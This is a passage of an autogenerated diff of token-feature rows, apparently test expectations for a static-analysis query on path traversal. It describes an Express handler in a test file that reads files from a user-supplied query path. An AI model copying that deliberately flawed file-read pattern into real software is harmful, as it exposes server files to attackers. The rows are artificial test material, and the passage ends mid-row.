readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:7:54:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:25:54:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:25:54:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:25:54:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:25:54:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:25:54:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:35:54:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:54:35:54:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:54:35:54:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:54:35:54:48 | req.query.path | calleeImports | path | @@ -7774,6 +70872,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:54:35:54:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:54:35:54:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:54:35:54:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:54:39:54:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:39:54:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:39:54:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:39:54:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:39:54:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:54:45:54:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:54:45:54:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:54:45:54:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:54:45:54:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:54:45:54:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:21 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | exceptional return of path.st ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | exceptional return of path.st ... h("..") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | exceptional return of path.st ... h("..") | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | exceptional return of path.st ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | exceptional return of path.st ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | path.st ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | path.st ... h("..") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | path.st ... h("..") | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | path.st ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:56:7:56:27 | path.st ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:56:12:56:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:56:12:56:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:56:12:56:21 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:56:12:56:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:56:12:56:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:56:23:56:26 | ".." | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:56:23:56:26 | ".." | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:56:23:56:26 | ".." | calleeImports | path | @@ -7783,6 +70916,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:56:23:56:26 | ".." | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:56:23:56:26 | ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:56:23:56:26 | ".." | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:59:3:59:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:59:6:59:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:59:6:59:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:59:6:59:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:59:6:59:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:59:6:59:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:59:19:59:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:59:19:59:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:59:19:59:22 | path | calleeImports | fs | @@ -7792,6 +70950,37 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:59:19:59:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:59:19:59:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:59:19:59:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | exceptional return of fs.read ... + path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | exceptional return of fs.read ... + path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | exceptional return of fs.read ... + path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | exceptional return of fs.read ... + path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | exceptional return of fs.read ... + path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | fs.read ... + path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | fs.read ... + path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | fs.read ... + path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | fs.read ... + path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:61:3:61:30 | fs.read ... + path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:61:6:61:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:61:6:61:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:61:6:61:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:61:6:61:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:61:6:61:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:61:19:61:22 | "./" | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:61:19:61:22 | "./" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:61:19:61:22 | "./" | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:61:19:61:22 | "./" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:61:19:61:22 | "./" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:61:19:61:22 | "./" | stringConcatenatedWith | -endpoint- path | | autogenerated/TaintedPath/normalizedPaths.js:61:19:61:29 | "./" + path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:61:19:61:29 | "./" + path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:61:19:61:29 | "./" + path | calleeImports | fs | @@ -7801,6 +70990,43 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:61:19:61:29 | "./" + path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:61:19:61:29 | "./" + path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:61:19:61:29 | "./" + path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:61:26:61:29 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:61:26:61:29 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:61:26:61:29 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:61:26:61:29 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:61:26:61:29 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:61:26:61:29 | path | stringConcatenatedWith | './' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | exceptional return of fs.read ... .html") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | exceptional return of fs.read ... .html") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | exceptional return of fs.read ... .html") | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | exceptional return of fs.read ... .html") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | exceptional return of fs.read ... .html") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | fs.read ... .html") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | fs.read ... .html") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | fs.read ... .html") | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | fs.read ... .html") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:63:3:63:39 | fs.read ... .html") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:63:6:63:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:63:6:63:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:63:6:63:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:63:6:63:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:63:6:63:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:63:19:63:22 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:63:19:63:22 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:63:19:63:22 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs 